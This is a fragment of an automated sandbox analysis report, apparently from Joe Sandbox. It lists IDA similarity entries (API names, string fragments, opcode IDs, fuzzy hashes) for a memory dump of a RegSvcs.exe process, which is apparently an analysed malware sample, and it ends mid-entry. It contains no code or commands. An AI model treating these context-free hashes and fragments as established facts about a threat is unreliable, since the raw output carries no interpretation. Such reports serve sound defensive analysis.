                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                      • String ID: ~
                                                                                                                                      • API String ID: 237503144-2894255414
                                                                                                                                      • Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                                                      • Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
                                                                                                                                      • Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                                                      • Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&?3$0-/?$99C?$;(?>
                                                                                                                                      • API String ID: 0-2409071036
                                                                                                                                      • Opcode ID: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                                                                                                      • Instruction ID: f66a5fe417f6b708e5f26068a280dd0292c096a76de8314330cd7006a92fc357
                                                                                                                                      • Opcode Fuzzy Hash: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                                                                                                      • Instruction Fuzzy Hash: 2AD15EB49007419FD720EF39D586752BFF0EB12300F544AAED8EA4B786D334A45ACB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "$MP$`]0o$mooj
                                                                                                                                      • API String ID: 0-750224902
                                                                                                                                      • Opcode ID: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                                                                                                      • Instruction ID: b19b03646b16de912904001b94da70090da2d56033d31c768745f7e78282d27d
                                                                                                                                      • Opcode Fuzzy Hash: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                                                                                                      • Instruction Fuzzy Hash: EC71183150D3929AD711CF29849077BFFE1AF96344F1889BED4C4AB387C639890AC766
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >j%h$YF$]Z
                                                                                                                                      • API String ID: 0-4187760579
                                                                                                                                      • Opcode ID: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                                                                                                      • Instruction ID: 9eece3b8ce7a95ea6ecb53f0b37b23c6ac9ce84f3b4a74f9026e79692fb54b94
                                                                                                                                      • Opcode Fuzzy Hash: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                                                                                                      • Instruction Fuzzy Hash: CD02037160C3009BD7189F25C8916AFBBF2EFD5314F08892DE4D58B382E7399946C78A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )2^$khvr$|lx1
                                                                                                                                      • API String ID: 0-2191243274
                                                                                                                                      • Opcode ID: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                                                                                                      • Instruction ID: 4de4a3a3beb6c19d42a4d3ade4e4e91008c027f5d3f459ded0861b50ff37b2bd
                                                                                                                                      • Opcode Fuzzy Hash: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                                                                                                      • Instruction Fuzzy Hash: 27412974605691CBD7158F3AD490772BBA2AF9B304F5C85ADC4C78B396C6389846CB18
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: NP,?$EA
                                                                                                                                      • API String ID: 0-3550630486
                                                                                                                                      • Opcode ID: c3fe83afa5a30e54b6e8a3cff27c06c2c4d8ab23645e24b90476cb730a4f2932
                                                                                                                                      • Instruction ID: 2e7f34938e04f27cbf53eb242d69fe801042e8981dab05c8edde02431b6dd9ba
                                                                                                                                      • Opcode Fuzzy Hash: c3fe83afa5a30e54b6e8a3cff27c06c2c4d8ab23645e24b90476cb730a4f2932
                                                                                                                                      • Instruction Fuzzy Hash: 5E4222B4608201DBD7148F28E841BBB73A1FF86328F154A2DF591572E1E778EC55C78A
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB56
                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB72
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeSecurity
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 640775948-0
                                                                                                                                      • Opcode ID: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                                                                                                      • Instruction ID: ff61b9231b5af6c48cb1d82934a630ea8aeeaa7d7eb1477661cb3efef4af383c
                                                                                                                                      • Opcode Fuzzy Hash: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                                                                                                      • Instruction Fuzzy Hash: 72E0BD383C83007BF6398B08AC97F247221A743F22F301214B3623E2E58AE07140451D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LMB$pv
                                                                                                                                      • API String ID: 0-122907696
                                                                                                                                      • Opcode ID: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                                                                                                      • Instruction ID: 3eeefadaa77a5fd53610c3ddf5e6e08206d1469657b97126345bc7f1514b4473
                                                                                                                                      • Opcode Fuzzy Hash: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                                                                                                      • Instruction Fuzzy Hash: 17E134B15183008BD3249F29C8623ABB7F1EFD2314F19892DD5C68B3A5E7799846C786
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JO}$no
                                                                                                                                      • API String ID: 0-1394444436
                                                                                                                                      • Opcode ID: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                                                                                                      • Instruction ID: a84f769f8163236c19afa71ab8ebfca9a7e40634951dcb5e8a3fb7dd6940477d
                                                                                                                                      • Opcode Fuzzy Hash: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                                                                                                      • Instruction Fuzzy Hash: 5AC1F3B160C3408BD718DF35D8916AFBBE2EBD2304F144A2DE5D29B392DA38C509CB56
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: NP,?$mij
                                                                                                                                      • API String ID: 0-1436015776
                                                                                                                                      • Opcode ID: 45ebc3105339b42078e607bf83b66e666b66b6b690706d3d7697e1b07faf0745
                                                                                                                                      • Instruction ID: d401854fd2cc12c548c1ecfb90c4d04a7bab5840ee8d20629697b9478a788be7
                                                                                                                                      • Opcode Fuzzy Hash: 45ebc3105339b42078e607bf83b66e666b66b6b690706d3d7697e1b07faf0745
                                                                                                                                      • Instruction Fuzzy Hash: BAA159756043109BD314DF25C8C162BB7A1EBC9728F24662EE9A5373D1D338EC018BDA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: M"O$fI.K
                                                                                                                                      • API String ID: 0-3473069917
                                                                                                                                      • Opcode ID: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                                                                                                      • Instruction ID: 329e37de618e8a484b718af78b4319e64e69ed5ee2b204ae71a9d2e2a7026588
                                                                                                                                      • Opcode Fuzzy Hash: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                                                                                                      • Instruction Fuzzy Hash: 6431F275204691CBE7058F2AD450332FBE2EFA2310F69959DC0C69B392C679A8038B98
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: M"O$fI.K
                                                                                                                                      • API String ID: 0-3473069917
                                                                                                                                      • Opcode ID: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                                                                                                      • Instruction ID: f6fd3104235a574d950e3c7a6e1b37e2e28bb9fd8ddddb0b7385076b5cae7f54
                                                                                                                                      • Opcode Fuzzy Hash: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                                                                                                      • Instruction Fuzzy Hash: 9531E4752047418BE705CF2AD850723FBE2EFA6310F69959DC0C59F392CA79A843CB88
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: klm"
                                                                                                                                      • API String ID: 2994545307-2308819284
                                                                                                                                      • Opcode ID: 155af321dca0877a975dbeb988d6c97a00e6f67a4f7271d2c8cd6a528275943e
                                                                                                                                      • Instruction ID: 8789bd8e5de170319836c8e6b4e836532e50f116dbbdcba0dddf1708612731d7
                                                                                                                                      • Opcode Fuzzy Hash: 155af321dca0877a975dbeb988d6c97a00e6f67a4f7271d2c8cd6a528275943e
                                                                                                                                      • Instruction Fuzzy Hash: 8EB15A7270C3618BE7188F39E84167BB791EF95314F99862ED48597381D378EC0683DA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @uB
                                                                                                                                      • API String ID: 0-1161951709
                                                                                                                                      • Opcode ID: 5fae505a0b6445c19c0876e7b2e71ef061004b8bfd78d55148886646686598c6
                                                                                                                                      • Instruction ID: 3f551a4cb18cdb69ea81a70624d177d743b65059aaf82db93a0913f8d0b3051b
                                                                                                                                      • Opcode Fuzzy Hash: 5fae505a0b6445c19c0876e7b2e71ef061004b8bfd78d55148886646686598c6
                                                                                                                                      • Instruction Fuzzy Hash: BBA10FB560C300CFD714DF29E84162BB7E5FB86314F98482EF585A3251EB78E902CB5A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %=>?
                                                                                                                                      • API String ID: 0-1840824467
                                                                                                                                      • Opcode ID: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                                                                                                      • Instruction ID: 2abc8e8e60c77c2f0b16dca8ff0b337e7e89a8bc06769c8938415a8ee5640db8
                                                                                                                                      • Opcode Fuzzy Hash: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                                                                                                      • Instruction Fuzzy Hash: 3291F832F046664BC7108E2DCA8025BB7E1ABC5754F698A3EE8D4E73D5EA3CCC454789
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 79.'
                                                                                                                                      • API String ID: 0-3373235548
                                                                                                                                      • Opcode ID: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                                                                                                      • Instruction ID: 405c93bd9d9a1b956de89b764b78e8638e9be0a0d1f875f63fdafa76fe9ef724
                                                                                                                                      • Opcode Fuzzy Hash: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                                                                                                      • Instruction Fuzzy Hash: 4841E7745043A08BE7274B2A98A0733BFE1BF13305F68598DD0D21B792C26AA407CB55
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: WT
                                                                                                                                      • API String ID: 0-3626323073
                                                                                                                                      • Opcode ID: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                                                                                                      • Instruction ID: 7fe90350ce32cbd7e95176aa356467c42c1670bfe7b117e2a0000bb4fcdc20cd
                                                                                                                                      • Opcode Fuzzy Hash: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                                                                                                      • Instruction Fuzzy Hash: 27213A766083408FC7288F24C89066BF7E2EFC6318F19891DD69717685DB75A806CF8A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "jB
                                                                                                                                      • API String ID: 0-3276335117
                                                                                                                                      • Opcode ID: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                                                                                                      • Instruction ID: 5e1d8c0b1515ecfa31faa1c568337e693052fbc6b42adfdfb911d364570a270e
                                                                                                                                      • Opcode Fuzzy Hash: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                                                                                                      • Instruction Fuzzy Hash: D3C08CB6C080028FC5002F00AC0201AB9316B0320CF082039E40931133FA32F625950F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
                                                                                                                                      • Instruction ID: 4df813ee5f95e841ab821c98b8b5526f3f5ae33236fdb9f70e9fd3558806e740
                                                                                                                                      • Opcode Fuzzy Hash: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
                                                                                                                                      • Instruction Fuzzy Hash: FA22A371A087119BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B811CB87
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
                                                                                                                                      • Instruction ID: 4fc516d3c2b442602e552858b68be7734632adc4e96252525e150f64ed3c5c82
                                                                                                                                      • Opcode Fuzzy Hash: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
                                                                                                                                      • Instruction Fuzzy Hash: A3C12DB6E016258FCB18CF68D89166EB7F1FF89310F59456DD816AB391DB34AC01CB90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9003a8afb13679d818a3d43514655988d7ae9c1512a6f50e48cad5daa46c4bf7
                                                                                                                                      • Instruction ID: ecd98b3e30f16e247b6e37ac7b6d2412abfb1e49c209f28e4dabdc3486cf8122
                                                                                                                                      • Opcode Fuzzy Hash: 9003a8afb13679d818a3d43514655988d7ae9c1512a6f50e48cad5daa46c4bf7
                                                                                                                                      • Instruction Fuzzy Hash: BCA11934204A01CFD7158F29D850AF6B7A2FF87310F5945AAD1968B3E2D738A852CB99
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
                                                                                                                                      • Instruction ID: 9e2cb37ed21e11fbad960dddf737aaa980f21f536591a4909efc8a2909d6cdd4
                                                                                                                                      • Opcode Fuzzy Hash: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
                                                                                                                                      • Instruction Fuzzy Hash: 8B816BB2A093208BC718DF24D85026BBBF2EFD1314F59CA2DE4C59B394E7789905C786
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 40105da8f403ad07f42bd831979dc75654737df275f4b6761c3cf010bfa6a017
                                                                                                                                      • Instruction ID: 16ab1bb8e5813cbead69206b7097d26a452845dfa9c2a9323bffdb95a06fe9c3
                                                                                                                                      • Opcode Fuzzy Hash: 40105da8f403ad07f42bd831979dc75654737df275f4b6761c3cf010bfa6a017
                                                                                                                                      • Instruction Fuzzy Hash: 3B81C0342042028BE724DF19C980A2BB3F1FF99314F55866DF9949B3A1EB75DC52CB4A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
                                                                                                                                      • Instruction ID: 50f91a7135ac995fafd84abb40a2ff73bb47e1f903fd8f1524f89d133c35058d
                                                                                                                                      • Opcode Fuzzy Hash: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
                                                                                                                                      • Instruction Fuzzy Hash: B461B974A083918FC7258F38C88096F7BE1AF96310F0882BEE8D44B392D679DC45C796
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
                                                                                                                                      • Instruction ID: 54b1615ece0800edf578a66f6fa2aba7240dcbf02494f9453b14f9bc813aead1
                                                                                                                                      • Opcode Fuzzy Hash: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
                                                                                                                                      • Instruction Fuzzy Hash: 39411732B0C2654BC7149E2D8D5427ABBD29FC5218F0DC57EA8C9DB7C7E57898009785
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
                                                                                                                                      • Instruction ID: 3e828dc637c6aee99513c29835b99d357d4520004c741a88f318c34ece8bb8a3
                                                                                                                                      • Opcode Fuzzy Hash: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
                                                                                                                                      • Instruction Fuzzy Hash: E941E071E043258BDB10DF49D8922ABB372FF66314F19411ADC84AB354E739AD01CBA9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
                                                                                                                                      • Instruction ID: f2730a4bd8400e6ccca1806e7c2ae68197e714b3aafd468424d48539a12bf7a5
                                                                                                                                      • Opcode Fuzzy Hash: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
                                                                                                                                      • Instruction Fuzzy Hash: 963179221487538BDB148928C9911B7FB51EFB2360F18473FC492177C1EB38A929D3E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 550955050dfdcde3c904be6984569726dad2dcd699ae92ba3bf8c7e90d3e8808
                                                                                                                                      • Instruction ID: f14b1e3348f7832c914038d0d787e57ee05bed21178a428e04cc6a3a25562b9c
                                                                                                                                      • Opcode Fuzzy Hash: 550955050dfdcde3c904be6984569726dad2dcd699ae92ba3bf8c7e90d3e8808
                                                                                                                                      • Instruction Fuzzy Hash: 5A311474610601CFD719CF2AC990A3377A2FB8A310B248E69D5566BBE5D774EC21CB88
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 20eb69036d69807debfbd8ef52ec59536dd4d5321856e452b3146c9f2ae76fca
                                                                                                                                      • Instruction ID: 8f228e5e5a1e4a0df9a7232996a6af5781287942daa8e57b9f502877da121123
                                                                                                                                      • Opcode Fuzzy Hash: 20eb69036d69807debfbd8ef52ec59536dd4d5321856e452b3146c9f2ae76fca
                                                                                                                                      • Instruction Fuzzy Hash: 4F312735B406428BE7298F29D850332FBA3EF96324B2C825DD1D1577E6D778EC42C644
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 398ed19c1b5591b7a93386f97a201355981c08b3bbe4d8edfbabb66191edd784
                                                                                                                                      • Instruction ID: 57171615dec06f4b3ea34e7e1adccaef3f23bda716e905d6b8a786efa676c01b
                                                                                                                                      • Opcode Fuzzy Hash: 398ed19c1b5591b7a93386f97a201355981c08b3bbe4d8edfbabb66191edd784
                                                                                                                                      • Instruction Fuzzy Hash: 8E318478B00502DFD318CF69DC40A327367FB86315B65863AE512A73E4DB74EC268A9D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
